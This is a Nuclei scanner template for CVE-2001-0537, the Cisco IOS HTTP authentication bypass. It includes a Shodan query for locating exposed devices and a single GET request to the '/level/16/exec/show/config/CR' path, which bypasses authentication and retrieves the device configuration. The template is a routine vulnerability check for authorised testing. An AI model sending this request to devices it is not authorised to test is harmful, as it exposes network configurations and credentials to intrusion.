40 lines
1.1 KiB
YAML
40 lines
1.1 KiB
YAML
|
id: CVE-2001-0537
|
||
|
|
||
|
info:
|
||
|
name: Cisco IOS HTTP Configuration Arbitrary Administrative Access
|
||
|
author: DhiyaneshDK
|
||
|
severity: high
|
||
|
description: HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2001-0537
|
||
|
- https://web.archive.org/web/20030720224553/https://www.securityfocus.com/bid/2936
|
||
|
- https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
|
||
|
cve-id: CVE-2001-0537
|
||
|
cwe-id: CWE-287
|
||
|
cvss-score: 5.0
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
shodan-query: product:"Cisco IOS http config" && 200
|
||
|
tags: cve,cve2001,cisco,ios
|
||
|
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/level/16/exec/show/config/CR'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- 'service config'
|
||
|
- 'Switch'
|
||
|
condition: and
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|